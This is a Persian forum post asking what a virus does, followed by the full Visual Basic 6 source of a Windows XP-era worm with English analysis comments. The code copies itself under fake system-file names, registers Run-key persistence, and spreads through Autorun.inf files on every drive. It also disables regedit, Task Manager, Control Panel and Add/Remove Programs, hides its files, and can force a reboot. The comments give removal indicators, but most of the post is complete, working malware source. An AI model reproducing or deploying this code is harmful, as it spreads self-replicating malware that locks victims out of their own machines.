
سلام

ارسال شده: سه‌شنبه ۱۲ آذر ۱۳۸۷, ۷:۱۴ ب.ظ
توسط pisha
سلام
من سورس یک ویروس با آنتی ویروسش دارم اما نمیدونم چی کار میکنه و میترسم روی سیستم خودم امتحان کنم میدونین این ویروس چی کار میکنه. :AA:

Module 1 (API declarations, constants and module-level variables):

' ===== Analysis (review) =====
' This is the VB6 source of an XP-era Windows "sabotage" worm. From the code in
' this listing alone, when its payload routine (Sabotage) runs it:
'   * copies itself to system32\drivers\svchost.exe, system32\drivers\dllhost.exe
'     and "Documents and Settings\All Users\Application Data\services.exe", marks
'     the copies hidden+system+read-only, registers them under
'     HKLM\Software\Microsoft\Windows\CurrentVersion\Run (values "svchost",
'     "krnl32 dllhost", "ctfmon") and launches them (AddToRun_Copy_Hide);
'   * writes Autorun.inf + Autorun.exe to the root of every enumerated drive
'     (MakeAutoRun) so it can spread via removable media;
'   * sets registry policies that disable regedit, Task Manager, Display
'     Properties, shutdown, Search, My Computer properties, Run, the All
'     Programs menu, Control Panel, Folder Options and Add/Remove Programs,
'     hides drive C: and tampers with the "show hidden files" settings (Sabotage);
'   * overwrites RegisteredOwner/RegisteredOrganization with a hard-coded name
'     and blog URL (ChangeNameAndCompanyName);
'   * CloseProgram reboots the machine immediately if a given window title exists.
' No networking, file encryption or credential-theft code appears in this listing.
' Every API return code is discarded and most routines run under
' On Error Resume Next, so on a non-admin account the HKLM/system32 writes just
' fail silently. Do not execute it outside an isolated, snapshot-backed VM.
'
' --- advapi32 registry imports (ANSI variants). Used by SaveString, AddToRun
' and ChangeNameAndCompanyName. RegDeleteValue/RegOpenKey have no caller here.
Public Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal HKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
' lpData is "As Any" without ByVal: callers pass a Long ByRef (address of the DWORD) or "ByVal <string>" for REG_SZ.
Public Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal HKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Public Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal HKey As Long, ByVal lpValueName As String) As Long
Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal HKey As Long) As Long
Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal HKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
' Predefined root-key handles. Only HKEY_CURRENT_USER and HKEY_LOCAL_MACHINE are used below.
Public Const HKEY_CLASSES_ROOT = &H80000000
Public Const HKEY_CURRENT_CONFIG = &H80000005
Public Const HKEY_USERS = &H80000003
Public Const HKEY_CURRENT_USER = &H80000001
Public Const HKEY_LOCAL_MACHINE = &H80000002
' Registry value types. Only REG_SZ and REG_DWORD are used below.
Public Const REG_SZ = 1
Public Const REG_DWORD = 4
Public Const REG_NONE = 0
Public Const REG_MULTI_SZ = 7
Public Const REG_EXPAND_SZ = 2
Public Const REG_BINARY = 3

' --- user32 / gdi32 / kernel32 imports. In this listing only GetWindowsDirectory
' (WinDrive), SendMessage (CloseProgram) and SetWindowPos (MakeTopMost) have a
' caller. The rest — layered/transparent windows, window enumeration and
' retitling, drawing on a window DC, BlockInput, SwapMouseButton — are
' capabilities the program imports but does not exercise in the code shown;
' the form code that might use them is not part of this post.
Public Declare Function SetWindowLong Lib "User32" Alias "SetWindowLongA" (ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Public Declare Function SetLayeredWindowAttributes Lib "user32.dll" (ByVal hWnd As Long, ByVal crKey As Long, ByVal bAlpha As Byte, ByVal dwFlags As Long) As Long
Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function SetWindowText Lib "User32" Alias "SetWindowTextA" (ByVal hWnd As Long, ByVal lpString As String) As Long
Public Declare Function EnumWindows Lib "User32" (ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long
Public Declare Function IsWindowVisible Lib "User32" (ByVal hWnd As Long) As Long
Public Declare Function GetParent Lib "User32" (ByVal hWnd As Long) As Long
Public Declare Function GetWindowLong Lib "User32" Alias "GetWindowLongA" (ByVal hWnd As Long, ByVal nIndex As Long) As Long
Public Declare Function GetWindowText Lib "User32" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Public Declare Function SendMessage Lib "User32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Public Const GWL_HWNDPARENT = (-8)
Public Const LB_ADDSTRING = &H180
Public Const LB_SETITEMDATA = &H19A
Public Declare Function GetActiveWindow Lib "User32" () As Long

Public Declare Function GetWindowDC Lib "User32" (ByVal hWnd As Long) As Long
Public Declare Function TextOut Lib "gdi32" Alias "TextOutA" (ByVal hdc As Long, ByVal X As Long, ByVal Y As Long, ByVal lpString As String, ByVal nCount As Long) As Long
' BlockInput(1) would freeze keyboard and mouse; declared but not called in this listing.
Public Declare Function BlockInput Lib "User32" (ByVal fBlock As Long) As Long
Public Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

Public Const LWA_COLORKEY = &H1
Public Const GWL_EXSTYLE = (-20)
Public Const WS_EX_LAYERED = &H80000
Public Const BM_SETSTATE = &HF3

Public Const HWND_TOPMOST = -1
Public Const HWND_NOTOPMOST = -2
Public Const SWP_NOMOVE = &H2
Public Const SWP_NOSIZE = &H1
Public Const SWP_NOACTIVATE = &H10
Public Const SWP_SHOWWINDOW = &H40
' MakeTopMost passes these flags, so the X/Y/cx/cy arguments to SetWindowPos are ignored.
Public Const TOPMOST_FLAGS = SWP_NOMOVE Or SWP_NOSIZE
' Swaps left/right mouse buttons; declared but not called in this listing.
Public Declare Function SwapMouseButton Lib "User32" (ByVal bSwap As Long) As Long
' NOTE(review): the Y parameter lacks "ByVal ... As Long", so it is passed as a
' ByRef Variant (a pointer) where the API expects a Long. The stack size still
' matches, and the only caller uses SWP_NOMOVE, so the bogus Y is never read.
Public Declare Function SetWindowPos Lib "User32" (ByVal hWnd As Long, ByVal hWndInsertAfter As Long, ByVal X As Long, Y, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long

' --- ToolHelp32 snapshot flags and PROCESSENTRY32 layout. No
' CreateToolhelp32Snapshot / Process32First / Process32Next declaration appears
' in this listing, so process enumeration is not wired up in the code shown
' (the hSnapShot/uProcess globals below are never used here either).
Const TH32CS_SNAPHEAPLIST = &H1
Const TH32CS_SNAPPROCESS = &H2
Const TH32CS_SNAPTHREAD = &H4
Const TH32CS_SNAPMODULE = &H8
Const TH32CS_SNAPALL = (TH32CS_SNAPHEAPLIST Or TH32CS_SNAPPROCESS Or TH32CS_SNAPTHREAD Or TH32CS_SNAPMODULE)
Const TH32CS_INHERIT = &H80000000
Const MAX_PATH As Integer = 260
' NOTE(review): the Type is Private while uProcess (declared Public below) is
' of this type; VB6 may reject that combination when the module is compiled.
Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * MAX_PATH
End Type

' GetLogicalDriveStrings drives the per-drive loop in MakeAutoRun; FindWindow is
' used by CloseProgram to locate a window by title.
Public Declare Function GetLogicalDriveStrings Lib "kernel32" Alias "GetLogicalDriveStringsA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
Public Declare Function FindWindow Lib "User32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long

' Module-level state. Only strSource/strDest (scratch paths in
' AddToRun_Copy_Hide) are read or written in this listing; the rest have no
' reference here and presumably belong to form code that was not posted.
Public hSnapShot As Long, uProcess As PROCESSENTRY32
Public blnMsgBoxResult As Boolean
Public strSource As String, strDest As String
Public strOutput(20) As String, strTemp As String
Public blnBlockinput As Boolean
Public strSysDir As String, strFileExist As String
Public strAppPath As String

Module 2 (payload routines: self-replication and persistence, autorun spreading, policy lockdown):
' Self-replication and persistence; the first step Sabotage runs.
' 1. Builds the path of the running executable (App.Path\App.EXEName.exe).
' 2. Unless this process is already named svchost, spoolsv or smss, drops three
'    copies under look-alike system names, registers each in
'    HKLM\Software\Microsoft\Windows\CurrentVersion\Run, marks it
'    hidden+system+read-only and starts it (Shell returns immediately):
'      <sysdrive>\WINDOWS\system32\drivers\svchost.exe             Run value "svchost"
'      <sysdrive>\WINDOWS\system32\drivers\dllhost.exe             Run value "krnl32 dllhost"
'      <sysdrive>\Documents and Settings\All Users\Application Data\services.exe
'                                                                 Run value "ctfmon"
' All failures are swallowed by On Error Resume Next. The "WINDOWS" and
' "Documents and Settings" folder names are hard-coded, i.e. the XP layout.
' NOTE(review): the genuine svchost/dllhost/services binaries live in system32
' itself, not in system32\drivers or All Users\Application Data — those paths
' and Run values are the indicators to hunt for and remove.
' NOTE(review): the guard exempts only "svchost", "spoolsv" and "smss". The
' dllhost.exe and services.exe copies are not exempt, so if they also reach this
' routine at startup they repeat the drop-and-launch sequence; whether they do
' depends on the form/startup code, which is not in this listing.
' blnVirusRuning is not declared anywhere in this listing.
Public Sub AddToRun_Copy_Hide()
blnVirusRuning = True
On Error Resume Next

' Full path of the currently running copy.
strSource = App.Path & IIf(Len(App.Path) > 0, "\", Empty)
strSource = strSource & App.EXEName & ".exe"

If (App.EXEName <> "svchost" And App.EXEName <> "spoolsv" And App.EXEName <> "smss") Then
strDest = WinDrive & "WINDOWS\system32\drivers\"

FileCopy strSource, strDest & "svchost.exe"
AddToRun "svchost", strDest & "svchost.exe"
SetAttr strDest & "svchost.exe", vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
Shell strDest & "svchost.exe", vbNormalNoFocus

FileCopy strSource, strDest & "dllhost.exe"
AddToRun "krnl32 dllhost", strDest & "dllhost.exe"
SetAttr strDest & "dllhost.exe", vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
Shell strDest & "dllhost.exe", vbNormalNoFocus

' This third copy is also the one MakeAutoRun later copies to every drive root.
strDest = WinDrive & "Documents and Settings\All Users\Application Data\"
FileCopy strSource, strDest & "services.exe"
AddToRun "ctfmon", strDest & "services.exe"
SetAttr strDest & "services.exe", vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
Shell strDest & "services.exe", vbNormalNoFocus

End If
End Sub

' Creates (or opens) HKey\strPath and writes value strValue with lngLen bytes of
' type lngType taken from the address of lngdata. Because the lpData parameter
' of RegSetValueEx is "As Any" without ByVal, passing the Long ByRef hands the
' API a pointer to the DWORD — correct for REG_DWORD, the only type the callers
' in this listing use. The key handle is closed afterwards; every return code
' (r) is discarded, so failures (e.g. no rights on HKLM) go unnoticed.
Private Sub SaveString(ByVal HKey As Long, strPath As String, strValue As String, ByVal lngdata As Long, ByVal lngType As Long, ByVal lngLen As Long)
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(HKey, strPath, keyhand)
r = RegSetValueEx(keyhand, strValue, 0, lngType, lngdata, CLng(lngLen))
r = RegCloseKey(keyhand)
End Sub

' Pins the window lngHwnd above all non-topmost windows (HWND_TOPMOST) without
' moving or resizing it (TOPMOST_FLAGS = SWP_NOMOVE Or SWP_NOSIZE). No caller
' appears in this listing; presumably used by the form code that was not posted.
Public Sub MakeTopMost(lngHwnd As Long)
SetWindowPos lngHwnd, HWND_TOPMOST, 0, 0, 0, 0, TOPMOST_FLAGS
End Sub

' Returns the root of the drive holding the Windows directory, e.g. "C:\" — the
' first three characters of what GetWindowsDirectory writes into a 500-byte
' buffer. "A" is an undeclared (implicit) variable that just absorbs the return
' length. Callers append hard-coded XP-era sub-paths to this result.
Public Function WinDrive() As String
Dim strDrive As String
strDrive = Space(500)
A = GetWindowsDirectory(strDrive, Len(strDrive))
strDrive = Left(strDrive, 3)
WinDrive = strDrive
End Function

' Looks up a top-level window by its exact title. If none exists, returns.
' Otherwise sends it WM_CLOSE (&H10) and then immediately REBOOTS the machine
' by shelling "Shutdown -r -t 0" — the name undersells what this does.
' "Handle" is an undeclared (implicit) local. No caller appears in this listing,
' so which window titles trigger it is not visible here.
Public Sub CloseProgram(ByVal WindowName As String)
On Error Resume Next
Handle = FindWindow(vbNullString, WindowName)
If Handle = 0 Then Exit Sub
Call SendMessage(Handle, &H10, 0&, 0&)
Shell "Shutdown -r -t 0"
End Sub

' Spreads to every drive by dropping an Autorun.inf plus a copy of the dropper.
' Walks the list returned by GetLogicalDriveStrings; for each drive it writes an
' Autorun.inf whose OPEN, shell\open and shell\explore entries all launch
' Autorun.exe, copies the services.exe dropped by AddToRun_Copy_Hide to
' <drive>\Autorun.exe, and marks both files hidden+system+read-only.
' All errors are swallowed (On Error Resume Next). No caller appears in this
' listing. Cleanup: delete Autorun.inf and Autorun.exe from every drive root.
' NOTE(review): this relies on the XP-era AutoRun behaviour for removable
' drives; later Windows updates stopped honouring Autorun.inf on such media.
Public Sub MakeAutoRun()
Dim strDrive As String, strDrives As String
On Error Resume Next
' Autorun.inf body: double-click ("open") and right-click ("explore") verbs both run Autorun.exe.
strAutorun = "[autorun]" & vbCrLf & _
"OPEN=Autorun.exe" & vbCrLf & _
"shell\open=Open" & vbCrLf & _
"shell\open\Command=Autorun.exe" & vbCrLf & _
"shell\explore=Explore" & vbCrLf & _
"shell\explore\Command=""Autorun.exe -e"""

' NUL-filled buffer; the API fills it with "A:\<0>C:\<0>...<0><0>".
strDrives = String(255, Chr$(0))
Ret& = GetLogicalDriveStrings(255, strDrives)
' Discards everything up to and including the FIRST NUL, so the first drive in
' the list is skipped before the loop starts (on a typical XP box that is A:\).
strDrives = Right$(strDrives, Len(strDrives) - InStr(1, strDrives, Chr$(0)))
For i = 1 To 100
' A leading NUL means the list is exhausted.
If Left$(strDrives, InStr(1, strDrives, Chr$(0))) = Chr$(0) Then Exit For
strDrive = Left$(strDrives, InStr(1, strDrives, Chr$(0)) - 1)
' Only the Autorun.inf write is skipped for A:\; the SetAttr and FileCopy
' below still run for it (they fail silently when no floppy is present).
If strDrive <> "A:\" Then
Open strDrive & "Autorun.inf" For Output As #1
Print #1, strAutorun
Close #1
End If
SetAttr strDrive & "Autorun.inf", vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
' Source is the copy dropped by AddToRun_Copy_Hide; if that failed, this silently fails too.
FileCopy WinDrive & "Documents and Settings\All Users\Application Data\services.exe", strDrive & "Autorun.exe"
SetAttr strDrive & "Autorun.exe", vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
' Advance past the drive just handled.
strDrives = Right$(strDrives, Len(strDrives) - InStr(1, strDrives, Chr$(0)))
Next
End Sub

' Payload entry point: installs/persists the dropper, then applies every
' lockdown policy below in order. Nothing here is conditional — one call does
' all of it. Who calls Sabotage (form load, timer, ...) is not in this listing.
' Cleanup is the inverse: remove the Run values and dropped files from
' AddToRun_Copy_Hide and delete each registry value written by the Disable*
' routines (the values written are listed on each routine).
Public Sub Sabotage() ' Sabotage = "kharab-kari" (the Persian word for sabotage)
Call AddToRun_Copy_Hide
Call DisableRegEdit
Call DisableTaskManager
Call DisableDisplayProperties
Call DisableShutdown
Call DisableSearch
Call DisableMyComputerProperties
Call DisableRun
Call DisableAllPrograms
Call HideDrive_C
Call DisableControlPanel
Call DisableFolderOption
Call DontShowHiddenFiles
Call DontShowSuperHiddenFiles
Call DisableAddRemove
Call ChangeNameAndCompanyName
End Sub

' Writes HKCU\...\Policies\System\DisableRegistryTools = 1 (DWORD), the
' per-user policy that blocks regedit. Cleanup: delete this value.
Private Sub DisableRegEdit()
Call SaveString(HKEY_CURRENT_USER, "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", 1, REG_DWORD, 4)
End Sub

' Writes HKCU\...\Policies\System\DisableTaskMgr = 1 (DWORD), the per-user
' policy that blocks Task Manager. Cleanup: delete this value.
Private Sub DisableTaskManager()
Call SaveString(HKEY_CURRENT_USER, "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", 1, REG_DWORD, 4)
End Sub

' Writes HKCU\...\Policies\System\NoDispCPL = 1 (DWORD), hiding the Display
' control panel for the current user. Cleanup: delete this value.
Private Sub DisableDisplayProperties()
Call SaveString(HKEY_CURRENT_USER, "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "NoDispCPL", 1, REG_DWORD, 4)
End Sub

' Writes HKLM\...\policies\Explorer\NoClose = 1 (DWORD), the machine-wide
' policy that removes Shut Down from the Start menu. Cleanup: delete this value.
Private Sub DisableShutdown()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\policies\Explorer", "NoClose", 1, REG_DWORD, 4)
End Sub

' Writes HKLM\...\Policies\Explorer\NoFind = 1 (DWORD), the machine-wide policy
' that removes Search from the Start menu. Cleanup: delete this value.
Private Sub DisableSearch()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFind", 1, REG_DWORD, 4)
End Sub

' Writes HKLM\...\Policies\Explorer\NoPropertiesMyComputer = 1 (DWORD), blocking
' the My Computer > Properties dialog machine-wide. Cleanup: delete this value.
Private Sub DisableMyComputerProperties()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoPropertiesMyComputer", 1, REG_DWORD, 4)
End Sub

' Writes HKLM\...\Policies\Explorer\NoRun = 1 (DWORD), removing the Start > Run
' command machine-wide. Cleanup: delete this value.
Private Sub DisableRun()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoRun", 1, REG_DWORD, 4)
End Sub

' Writes HKLM\...\Policies\Explorer\NoStartMenuMorePrograms = 1 (DWORD), hiding
' the Start menu's All Programs list machine-wide. Cleanup: delete this value.
Private Sub DisableAllPrograms()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoStartMenuMorePrograms", 1, REG_DWORD, 4)
End Sub

' Writes HKLM\...\Policies\Explorer\NoDrives = 4 (DWORD). NoDrives is a bitmask
' (A=1, B=2, C=4, ...), so 4 hides only drive C: in Explorer, matching the sub
' name. Cleanup: delete this value.
Private Sub HideDrive_C()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoDrives", 4, REG_DWORD, 4)
End Sub

' Writes HKLM\...\Policies\Explorer\NoControlPanel = 1 (DWORD), blocking Control
' Panel machine-wide. Cleanup: delete this value.
Private Sub DisableControlPanel()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoControlPanel", 1, REG_DWORD, 4)
End Sub

' Writes HKLM\...\Policies\Explorer\NoFolderOptions = 1 (DWORD), removing the
' Folder Options dialog so the hidden-file settings tampered with below cannot
' be changed through the UI. Cleanup: delete this value.
Private Sub DisableFolderOption()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", 1, REG_DWORD, 4)
End Sub

' Keeps the dropped files invisible. Sets the current user's Explorer\Advanced
' Hidden = 0 (do not show hidden files) and rewrites the machine-wide Folder
' Options templates so that NOHIDDEN\CheckedValue = 2 and SHOWALL\CheckedValue
' = 0 — i.e. choosing "Show hidden files" in the dialog would write 0 and keep
' them hidden. Cleanup: restore SHOWALL\CheckedValue to 1 and set Hidden = 1.
Private Sub DontShowHiddenFiles()
Call SaveString(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN", "CheckedValue", 2, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL", "CheckedValue", 0, REG_DWORD, 4)
Call SaveString(HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "Hidden", 0, REG_DWORD, 4)
End Sub

' Same trick for "protected operating system files" (the dropped copies carry
' both the hidden and system attributes): SuperHidden\CheckedValue and
' UncheckedValue are both set to 0 machine-wide, and the current user's
' SuperHidden is set to 0, so the checkbox can no longer reveal them.
' Cleanup: restore SuperHidden\CheckedValue to 1 and delete the user value.
Private Sub DontShowSuperHiddenFiles()
Call SaveString(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden", "CheckedValue", 0, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden", "UncheckedValue", 0, REG_DWORD, 4)
Call SaveString(HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "SuperHidden", 0, REG_DWORD, 4)
End Sub

' Writes ten machine-wide policies under HKLM\...\Policies\Uninstall, all = 1
' (DWORD), disabling Add/Remove Programs and each of its pages and sources.
' Cleanup: delete the Uninstall policy key (it contains nothing else of value).
Private Sub DisableAddRemove()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoAddRemovePrograms", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoAddFromCDorFloppy", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoAddFromInternet", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoAddFromNetwork", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoAddPage", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoRemovePage", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoServices", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoSetFolders", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoSupportInfo", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoWindowsSetupPage", 1, REG_DWORD, 4)
End Sub

' Vanity tag: overwrites the owner/organisation strings shown in System
' Properties (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion) with a
' hard-coded name and blog URL. Both strings are good indicators of this
' sample. Return codes are discarded.
' NOTE(review): cbData is Len(...) without the terminating NUL; REG_SZ data is
' expected to include it (Len + 1). Same pattern in AddToRun.
Private Sub ChangeNameAndCompanyName()
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows NT\CurrentVersion", keyhand)
r = RegSetValueEx(keyhand, "RegisteredOwner", 0, REG_SZ, ByVal "Amir Amiri", Len("Amir Amiri"))
r = RegSetValueEx(keyhand, "RegisteredOrganization", 0, REG_SZ, ByVal "Http://V-Basic.Mihanblog.Com", Len("Http://V-Basic.Mihanblog.Com"))
r = RegCloseKey(keyhand)
End Sub

' Machine-wide persistence: writes the REG_SZ value ProgramName = FileToRun
' under HKLM\Software\Microsoft\Windows\CurrentVersion\Run, so FileToRun starts
' at every logon for every user. Return codes are discarded, so this silently
' does nothing without rights to HKLM.
' Cleanup: delete the Run values "svchost", "krnl32 dllhost" and "ctfmon"
' written by AddToRun_Copy_Hide (after checking their data points at the
' dropped paths, since "ctfmon" is also a legitimate value name).
' NOTE(review): cbData omits the terminating NUL (Len rather than Len + 1).
Public Sub AddToRun(ProgramName As String, FileToRun As String)
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run", keyhand)
r = RegSetValueEx(keyhand, ProgramName, 0, REG_SZ, ByVal FileToRun, Len(FileToRun))
r = RegCloseKey(keyhand)
End Sub